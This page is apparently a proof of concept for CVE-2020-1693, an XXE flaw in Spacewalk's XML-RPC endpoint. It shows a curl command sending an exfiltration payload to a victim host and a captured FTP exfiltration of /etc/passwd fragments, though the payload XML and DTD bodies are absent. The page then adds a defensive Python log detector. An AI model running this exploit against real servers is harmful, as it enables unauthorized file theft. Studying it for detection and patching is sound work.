Proof of Concept exploit for CVE-2020-1693 – Spacewalk <= 2.9 XXE

CVE Description
A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.

Local file read

External DTD:

XML-RPC call for final exploit

curl -X POST -sik https://victim.tld/rpc/api -H 'Content-Type: application/xml' --data @xxe-ftp-exfil.xml

With an FTP listener running, sending the request produces the remote DTD fetch in the web server log, followed by the exfiltration of the local file on the FTP listener.

"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"

2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
USER: anonymous
PASS: Java1.8.0_151@
/root:x:0:0:root:
/root:
/bin
2020/02/17 00:00:00 [*] Closing FTP Connection
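From the defender's side, the two artefacts above are the detection signal: a `.dtd` fetched by a `Java/` user agent (the server's XML parser resolving an external DTD) and an anonymous FTP session whose password is the Java runtime's `Java<version>@` string carrying file contents as path components. The following script is an added example written for this page, not part of the original proof of concept or the Spacewalk project; it runs over constructed log lines modelled on the page's output and flags both patterns.

```python
import re

# Constructed sample access log lines, modelled on the fetch shown on the page.
# The IP addresses and timestamps are made up for this example.
ACCESS_LOG = [
    '10.0.0.5 - - [17/Feb/2020:00:00:00 +0000] "GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"',
    '10.0.0.9 - - [17/Feb/2020:00:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Feb/2020:00:00:02 +0000] "GET /styles.css HTTP/1.1" 200 300 "-" "Java/1.8.0_151"',
]

# Constructed FTP listener output in the same shape as the page's transcript.
# The second session is a benign control case that must not be flagged.
FTP_LOG = """\
2020/02/17 00:00:00 [*] Connection Accepted from [10.0.0.5:41000]
USER: anonymous
PASS: Java1.8.0_151@
/root:x:0:0:root:
/root:
/bin
2020/02/17 00:00:00 [*] Closing FTP Connection
2020/02/17 00:01:00 [*] Connection Accepted from [10.0.0.9:41001]
USER: backup
PASS: hunter2
/data/file.bin
2020/02/17 00:01:05 [*] Closing FTP Connection
"""

# Combined-format access log: request line, status, size, referer, user agent.
ACCESS_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Java's default anonymous FTP password looks like "Java1.8.0_151@" (see the page's listener output).
JAVA_ANON_PASS = re.compile(r"^Java[\w.]+@$")


def find_dtd_fetches(lines):
    """Return (path, user_agent) for every .dtd request made by a Java HTTP client.

    On the attacker-controlled host this is the external DTD resolution; on a
    defender's outbound proxy it is the same signal that a server-side XML parser
    is resolving DTDs from the network."""
    hits = []
    for line in lines:
        m = ACCESS_RE.search(line)
        if not m:
            continue
        if m.group("path").lower().endswith(".dtd") and m.group("ua").startswith("Java/"):
            hits.append((m.group("path"), m.group("ua")))
    return hits


def find_ftp_exfil(text):
    """Group listener output into sessions and return those that look like Java XXE exfiltration.

    A session is flagged when the login is anonymous with a Java-style default
    password; the path components sent in between are returned as the leaked fragments."""
    sessions = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if "Connection Accepted from" in line:
            m = re.search(r"\[([^\]]+)\]$", line)
            current = {"peer": m.group(1) if m else "?", "user": None, "password": None, "fragments": []}
        elif current is None:
            continue  # lines outside a session are ignored
        elif line.startswith("USER:"):
            current["user"] = line.split(":", 1)[1].strip()
        elif line.startswith("PASS:"):
            current["password"] = line.split(":", 1)[1].strip()
        elif "Closing FTP Connection" in line:
            pw = current["password"] or ""
            if current["user"] == "anonymous" and JAVA_ANON_PASS.match(pw):
                sessions.append({"peer": current["peer"], "fragments": current["fragments"]})
            current = None
        else:
            current["fragments"].append(line)
    return sessions


if __name__ == "__main__":
    for path, ua in find_dtd_fetches(ACCESS_LOG):
        print(f"DTD fetch by Java client: {path} ({ua})")
    for s in find_ftp_exfil(FTP_LOG):
        print(f"Possible XXE exfil from {s['peer']}: {'/'.join(s['fragments'])}")
```

The FTP fragments are split on `/` because the file contents travel as successive path components; joining them with `/` gives an approximation of the original line, which is enough to tell an analyst which file was read.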